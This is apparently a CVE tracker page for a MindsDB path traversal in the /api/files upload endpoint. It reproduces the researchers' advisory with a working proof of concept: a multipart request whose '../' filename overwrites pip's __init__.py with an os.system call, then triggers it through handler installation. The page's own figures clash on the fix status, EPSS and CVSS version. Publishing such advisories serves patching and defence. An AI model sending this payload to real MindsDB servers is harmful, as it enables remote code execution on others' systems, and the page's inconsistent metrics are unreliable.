CVE-2026-27483

HIGHPre-NVD 8.88.8
EchelonGraph scoreLOW confidence

This high-severity CVE scores 8.8 under the CNA's CVSS (NVD's own analysis pending). EPSS exploit-prediction score not yet available (the EPSS model rescores nightly; freshly-published CVEs typically appear within 48 hours). GitHub Security Advisory data not yet ingested — confidence will rise once GHSA publishes (typical lag: hours to days for open-source ecosystem CVEs; never for infrastructure-only CVEs).

Triggered by: NVD CVSS baseline
Sources: cna:github_m
Elevated
8.8
EchelonGraph verdictPlan a fixSerious severity, but no confirmed exploitation yet.
  • High severity, but no confirmed exploitation yet
CISA-KEV: Not listedEPSS: 11%CVSS: 8.8Exploit: NoneExposed: 0

No vendor fix yet — apply a workaround or compensating control (WAF / firewall / segmentation) and watch for a patch.

MindsDB: Path Traversal in /api/files Leading to Remote Code Execution

Summary

There is a path traversal vulnerability in Mindsdb's /api/files interface, which an authenticated attacker can exploit to achieve remote command execution.

Details

The vulnerability exists in the "Upload File" module, which corresponds to the API endpoint /api/files. The affected code is located at mindsdb/api/http/namespaces/file.py:

@ns_conf.route("/")
@ns_conf.param("name", "MindsDB's name for file")
class File(Resource):
    @ns_conf.doc("put_file")
    @api_endpoint_metrics('PUT', '/files/file')
    def put(self, name: str):
        """add new file
        params in FormData:
  • file
  • original_file_name [optional]
"""

data = {} mindsdb_file_name = name

existing_file_names = ca.file_controller.get_files_names()

def on_field(field): name = field.field_name.decode() value = field.value.decode() data[name] = value

file_object = None

def on_file(file): nonlocal file_object data["file"] = file.file_name.decode() file_object = file.file_object

temp_dir_path = tempfile.mkdtemp(prefix="mindsdb_file_")

if request.headers["Content-Type"].startswith("multipart/form-data"): parser = multipart.create_form_parser( headers=request.headers, on_field=on_field, on_file=on_file, config={ "UPLOAD_DIR": temp_dir_path.encode(), # bytes required "UPLOAD_KEEP_FILENAME": True, "UPLOAD_KEEP_EXTENSIONS": True, "MAX_MEMORY_FILE_SIZE": 0, }, )

while True: chunk = request.stream.read(8192) if not chunk: break parser.write(chunk) parser.finalize() parser.close()

if file_object is not None: if not file_object.closed: try: file_object.flush() except (AttributeError, ValueError, OSError): logger.debug("Failed to flush file_object before closing.", exc_info=True) file_object.close() file_object = None else: data = request.json

Since the multipart file upload does not perform security checks on the uploaded file path, an attacker can perform path traversal by using ../ sequences in the filename field. The file write operation occurs before calling clear_filename and save_file, meaning there is no filtering of filenames or file types, allowing arbitrary content to be written to any path on the server.

PoC

This vulnerability can be exploited to overwrite existing executable files, which retain their executable permissions after being overwritten. In addition to conventional file upload exploitation methods, we provide a way to achieve Remote Code Execution (RCE) by leveraging MindsDB's own functionality.

The API endpoint //install is used to install handlers, which internally calls install_dependencies to install dependencies via pip. This function executes pip using subprocess.Popen. Therefore, an attacker can:

  • Exploit the vulnerability to overwrite /venv/lib/python3.10/site-packages/pip/__init__.py with a malicious Python script.
  • Trigger the execution of the malicious script by calling //install, which invokes pip.
Exploit:
PUT /api/files/mm HTTP/1.1
Host: ip:47334
Content-Length: 579
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Accept: application/json, text/plain, */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryv9dZC0cAHLlHSHD9
Origin: http://ip:47334
Referer: http://ip:47334/fileUpload
Accept-Encoding: gzip, deflate, br
Accept-Language: zh,en;q=0.9,zh-CN;q=0.8
Cookie: bid=87948125-5042-4fc8-a692-9cbf71e387be
Connection: keep-alive

------WebKitFormBoundaryv9dZC0cAHLlHSHD9 Content-Disposition: form-data; name="name"

mm ------WebKitFormBoundaryv9dZC0cAHLlHSHD9 Content-Disposition: form-data; name="source"

mm ------WebKitFormBoundaryv9dZC0cAHLlHSHD9 Content-Disposition: form-data; name="source_type"

file ------WebKitFormBoundaryv9dZC0cAHLlHSHD9 Content-Disposition: form-data; name="file"; filename="../../../../../../venv/lib/python3.10/site-packages/pip/__init__.py" Content-Type: text/plain

import os os.system("touch /tmp/rce_by_hacker") ------WebKitFormBoundaryv9dZC0cAHLlHSHD9--

After sending this request, you can observe the logs in Docker's output:
2025-05-30 02:26:52,432            http INFO     python_multipart.multipart: Opening a file on disk
2025-05-30 02:26:52,433            http INFO     python_multipart.multipart: Saving with filename in: b'/root/mdb_storage/tmp/mindsdb_byom_file_89h0zcz0'
2025-05-30 02:26:52,433            http INFO     python_multipart.multipart: Opening file: b'/root/mdb_storage/tmp/mindsdb_byom_file_89h0zcz0/../../../../../../venv/lib/python3.10/site-packages/pip/__init__.py'
At this point, you can see that the file has been successfully overwritten:
root@e445c93b2fd5:/mindsdb# cat /venv/lib/python3.10/site-packages/pip/__init__.py
import os
os.system("touch /tmp/rce_by_hacker")
Afterwards, install any handler in the UI, and you will see that the file rce_by_hacker is successfully created in the /tmp directory. The same result can also be achieved by sending an API request to trigger it.

Credit

This vulnerability was discovered by:

  • XlabAI Team of Tencent Xuanwu Lab
  • Atuin Automated Vulnerability Discovery Engine

If there are any questions regarding the vulnerability details, please feel free to reach out to MindsDB for further discussion at [email protected].

CVSS v3
8.8
EG Score
8.8(low)
EPSS
95.4%
KEV
Not listed

Published

February 24, 2026

Last Modified

February 24, 2026

Vendor Advisories for CVE-2026-27483(1)

These vendors published their own advisory mentioning this CVE — often with vendor-specific remediation steps + affected product lists not in NVD.

Affected Packages

(1 across 1 ecosystem)
PyPI(1)
PackageVulnerable rangeFixed inDependents
mindsdb0.6.5 ... 25.9.1.0 (552 versions)25.9.1.1

Data Freshness Timeline

(refreshed 10× in last 7d / 25× in last 30d)

Each row is a source pipeline that fetched or updated this CVE on that date, with what changed. For example, "NVD update" means NVD published or revised its analysis for this CVE; "MITRE cvelistV5" means we ingested or refreshed it from the CNA feed. Most recent first.

  1. 2026-07-12 05:46 UTCEPSS rescore
  2. 2026-07-11 08:27 UTCEPSS rescore
  3. 2026-07-09 19:10 UTCEPSS rescore
  4. 2026-07-08 15:15 UTCEPSS rescore
  5. 2026-07-08 15:15 UTCEPSS rescore
  6. 2026-07-07 13:46 UTCEPSS rescore
  7. 2026-07-06 16:27 UTCEPSS rescore
  8. 2026-07-06 16:27 UTCEPSS rescore
  9. 2026-07-06 02:23 UTCEPSS rescore
  10. 2026-07-06 02:23 UTCEPSS rescore
  11. 2026-07-05 02:30 UTCEPSS rescore
  12. 2026-07-04 06:31 UTCEPSS rescore
  13. 2026-07-04 06:31 UTCEPSS rescore
  14. 2026-07-01 15:06 UTCEPSS rescore
  15. 2026-07-01 15:06 UTCEPSS rescore
  16. 2026-06-30 23:22 UTCEPSS rescore
  17. 2026-06-30 23:22 UTCEPSS rescore
  18. 2026-06-29 14:06 UTCEPSS rescore
  19. 2026-06-28 14:07 UTCEPSS rescore
  20. 2026-06-28 14:07 UTCEPSS rescore
  21. 2026-06-28 04:56 UTCEPSS rescore
  22. 2026-06-28 04:56 UTCEPSS rescore
  23. 2026-06-27 03:08 UTCEPSS rescore
  24. 2026-06-26 15:44 UTCEG score recompute
  25. 2026-06-26 15:39 UTCOSV refresh

Publicly available exploits

(2 references)

Working exploit code is in the public domain (1 Exploit-DB entry). Defenders should treat patch urgency accordingly — public PoCs typically lead to mass-exploitation within 24-72 hours.

  • Exploit-DBEDB-52547
    First seen May 4, 2026

    MindsDB 25.9.1.1 - Path Traversal

    Open source ↗
  • Nucleihttp/cves/2026/CVE-2026-27483.yaml
    First seen Jan 1, 2026

    MindsDB - Remote Code Execution

    Open source ↗

Frequently asked(5)

What is CVE-2026-27483?
CVE-2026-27483 is a high vulnerability published on February 24, 2026. MindsDB: Path Traversal in /api/files Leading to Remote Code Execution Summary There is a path traversal vulnerability in Mindsdb's /api/files interface, which an authenticated attacker can exploit to achieve remote command execution. Details The vulnerability exists in the "Upload File" module,…
When was CVE-2026-27483 disclosed?
CVE-2026-27483 was first published in the National Vulnerability Database on February 24, 2026. EchelonGraph re-ingests CVE updates from NVD on a 2-hour cycle, so this page reflects the latest published state.
Is CVE-2026-27483 actively exploited?
CVE-2026-27483 is not currently on CISA's Known Exploited Vulnerabilities catalog. FIRST EPSS estimates a 95.4% percentile likelihood of exploitation in the next 30 days — higher percentiles indicate greater predicted risk.
What is the CVSS score of CVE-2026-27483?
CVE-2026-27483 has a CVSS v4.0 base score of 8.8 (CNA self-assessment; NVD's own analysis pending). The EG score is currently aggregating — additional source signals are being incorporated as they become available..
How do I remediate CVE-2026-27483?
Patch to the fixed version published by the affected vendor. Where vendor advisories exist for CVE-2026-27483, EchelonGraph cross-links them in the Vendor Advisories panel below — those typically contain the canonical remediation steps, fixed version numbers, and any vendor-specific mitigations.

Dependency Blast Radius

See which npm, PyPI, Go, and Maven packages are affected by CVE-2026-27483

Explore →

Is Your Infrastructure Affected by CVE-2026-27483?

EchelonGraph automatically scans your cloud infrastructure and maps CVE exposure using blast radius analysis.